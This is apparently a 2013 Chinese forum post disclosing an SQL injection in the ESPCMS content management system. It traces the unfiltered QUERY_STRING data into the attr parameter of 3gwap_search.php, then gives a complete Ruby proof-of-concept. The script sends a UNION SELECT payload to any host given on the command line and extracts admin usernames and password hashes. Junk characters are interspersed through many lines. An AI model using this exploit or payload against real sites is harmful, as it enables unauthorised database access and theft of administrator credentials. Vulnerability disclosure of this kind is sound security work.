0×0 漏洞概述0×1 漏洞细节
: c9 x5 f+ m% N v' r0×2 PoC7 L2 v0 k* `; X+ g! {8 W
! k- L3 x9 |8 ^5 `8 _& _* b! Y7 ^% }& O. p7 }: j8 h( ?- F
" l: X' j# ~$ J( \. I6 e1 Z
0×0 漏洞概述" u& r7 z$ w$ q( L8 ]. L( m
; a+ L# [7 j% V易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统,它具有操作简单、功能强大、稳定性好、扩展性及安全性强、二次开发及后期维护方便,可以帮您迅速、轻松地构建起一个强大专业的企业网站。
# B. H/ F9 k$ G/ P$ c; r其在处理传入的参数时考虑不严谨导致SQL注入发生
" I8 S. L+ r. z f1 a
) x5 y0 C5 K% c! g5 ~1 P) B' G/ r1 y/ l: H4 k# V& D$ j) N' n
0×1 漏洞细节
* U0 x- j$ w3 g" T. }7 m4 P ?
5 ?/ A; z" J! ~% I' b6 t7 k8 Y4 \变量的传递过程是$_SERVER['QUERY_STRING']->$urlcode->$output->$value->$db_where->$sql->mysql_query,整个过程无过滤导致了注入的发生。
% Y. B- ^4 u8 x L2 @8 }+ F, D8 Z正因为变量是从$_SERVER['QUERY_STRING']中去取的,所以正好避开了程序的过滤。* E. i9 ^3 l6 e7 Y
而注入的变量是数组的值,并非数组的key,所以也没过被过滤,综合起来形成了一个比较少见的SQL注入。
2 ]8 t: I% c. Z5 n+ O3 j3 s
& U, J8 n" x' k4 F8 l8 @在/interface/3gwap_search.php文件的in_result函数中:; K. P8 Y2 V& [4 |- E
7 D8 }5 q1 S4 i W" V2 L" h+ t- t- s/ t. l& M7 V" p
3 p, r9 Z$ q6 P0 i6 t& B7 n" q function in_result() {
! t* w0 I& L: U$ y- N" U- d# A ... ... ... ... ... ... ... ... ...) ]" ^+ @) b5 I( Z1 R
$urlcode = $_SERVER[ 'QUERY_STRING '];& {& k. Z) ]+ g+ L+ X* H2 g
parse_str(html_entity_decode($urlcode), $output);9 K* R# N8 h( d+ T! G
, _# f, [( N, b' X
... ... ... ... ... ... ... ... ...
1 _7 ]/ E' Z* x& `5 r" j if (is_array($output['attr' ]) && count($output['attr']) > 0) {) p: g* k9 r% J3 n) W8 O2 U
. {% z$ G% k* y+ a) f: g $db_table = db_prefix . 'model_att';
5 a9 T9 I, r8 @( `9 N X
* a9 |" u! U: u- y% E foreach ($output['attr' ] as $key => $value) {0 T# a! X' Y# a
if ($value) {
; X/ t3 e, F/ y- ?
U" K A- b j0 ]9 d6 A( _ $key = addslashes($key);) a3 z1 p5 _9 v2 g* D5 v
$key = $this-> fun->inputcodetrim($key);
5 u* {: f1 v! L, i1 [ $db_att_where = " WHERE isclass=1 AND attrname='$key'";: y: q. n, u3 ?" v: {
$countnum = $this->db_numrows($db_table, $db_att_where);* F$ }" A0 \ I; i
if ($countnum > 0) {- g S; ~2 |& O
$db_where .= ' AND b.' . $key . '=\'' . $value . '\'' ;' N6 }, B8 l4 }3 Z1 N' y
}+ s7 R# \& R6 K! F8 n' U! _
}
) E! w) \9 ]/ s1 L }
6 a3 ]: i: P/ r* {- t* O8 v }. ^# _( E* m, G( s7 S7 u
if (!empty ($keyword) && empty($keyname)) {6 ~$ q3 E. Z* |
$keyname = 'title';* y1 S( y) z3 S5 j) M9 ?% W
$db_where.= " AND a.title like '%$keyword%'" ;- l, {7 c. p2 n. N4 s+ O& R
} elseif (!empty ($keyword) && !empty($keyname)) {
) w( J7 A# }- g- f! D $db_where.= " AND $keyname like '% $keyword%'";6 Q- H$ T1 m. V6 t j$ t
}
`6 b1 ?3 I( |; E0 D/ }5 C' J $pagemax = 15;
' D3 _. k3 n$ f3 A
6 w( A) z; R- n! |( v9 T $pagesylte = 1;
1 ]$ q# @5 |' B' {% `4 J
3 K- G: _/ o9 d0 }' I if ($countnum > 0) {( ~* q( F: s! l7 G u6 f
. i) ]+ V# t# i/ C* O
$numpage = ceil($countnum / $pagemax);
6 i: @' }9 v0 `' d: }8 r } else {
& s+ ]3 f* I" m4 R, [0 ?1 W* Y- R $numpage = 1;
3 H6 f; z5 ]6 Y1 L2 k# P f" Y1 P }
% E; Y0 l: H9 |* y/ h $sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;& x/ B* ~, d7 [$ v6 L7 w
$this-> htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON ['file_fileex' ], 5, $this->lng['pagebotton' ], $this->lng['gopageurl'], 0);2 i4 I8 O a7 e. x: ]* {$ b! f% q
$sql = $this-> htmlpage->PageSQL('a.did' , 'down' ); $rs = $this->db->query($sql);( T# m2 _( c; X
... ... ... ... ... ... ... ... ...6 c+ M2 s, `6 `# v- D) H$ a# ?! K
}
$ O1 v8 s* F/ Q4 W/ g" y
- l. g- ^; P# ]4 u, ]( Z( _( V. {% s
0×2 PoC
# X) H9 K. y1 Y' `6 A% m2 l. @3 z# d( o" p, s! e7 F
9 {. F$ P8 j/ H5 X% e6 W2 E2 s7 i/ I
require "net/http"
* g. x9 l3 S+ w. W, d
. K* k5 l6 U& T% u7 {, U$ U. Odef request(method, url)
! L P' h# f. m if method.eql?("get")
5 h# }# G \! N. o uri = URI.parse(url)4 t- [$ u' P t# |
http = Net::HTTP.new(uri.host, uri.port)
: |& B) w/ Y& N/ h response = http.request(Net::HTTP::Get.new(uri.request_uri))
& P3 l9 u4 L" ]4 O return response3 t/ U: w D0 S( v4 S( g/ }
end
! i) I& t! e" ~+ Gend5 P* E3 V& f9 j9 N0 [, _1 O
# O# C$ r4 U2 G
doc =<<HERE
! ?0 K9 d* c( o+ ]' k& {3 p7 w-------------------------------------------------------+ C0 Z9 r8 r& X5 C$ p
Espcms Injection Exploit
+ s2 F$ h$ R1 V6 L5 t3 jAuthor:ztz2 h @7 Z$ [" |4 G7 z
Blog:http://ztz.fuzzexp.org/
# a6 F* I; a$ N4 ? A-------------------------------------------------------
6 b9 }& ~9 A" S" j0 k+ n
4 t4 e! T& y' |HERE
( F2 r+ h, R. C. V" F, i1 V9 f, d# w# t
usage =<<HERE
* Y2 v T' T& C) o4 t8 _# B. n6 M! \Usage: ruby #{$0} host port path* }5 y K% _2 t, n' H4 |; W8 F; i7 g
example: ruby #{$0} www.target.com 80 /) B2 a* H4 ~, V: J$ _+ t
HERE: F9 y. q' }+ B5 x j' {# f) I
3 k& T% A1 t, jputs doc6 d6 O. M0 ^$ h* H" `7 p& S
if ARGV.length < 3/ Z1 R) @( w K- P8 ]
puts usage
7 w% ]9 D9 k4 Gelse1 q5 c I" ?0 s6 y% G$ v6 g
$host = ARGV[0]( Z V, T" `& b! s5 i4 f
$port = ARGV[1]9 y2 }" J9 u1 L6 c7 n! u) Q' t
$path = ARGV[2]
2 N, c+ a0 b% \9 [) m) k9 W8 z) s2 P# F" Z& i& e" K
puts "send request..."' e4 u- S0 Q; c3 ^% ]2 P
url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&* ]! T& N- `$ ~4 u- p4 n6 V
attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13
, B' m5 k1 A0 b l7 l7 [% b; b: y3 @9 D,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27
0 H2 Z5 ^8 k$ N5 c+ ?( G. t,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"7 G/ P" z* R! Y7 f' r" }+ V A9 {) F5 J
response = request("get", url)
4 W0 Y" X3 ?8 `* Z result = response.body.scan(/\w+&\w{32}/)' c% p( }# W" h' |+ C% O
puts result
: B6 R- l8 D. ?! dend4 g2 B! n' Y% r% P9 a
$ q: R" V0 ?8 G6 c
|
发表于 2013-7-27 18:31:52
收藏
支持
反对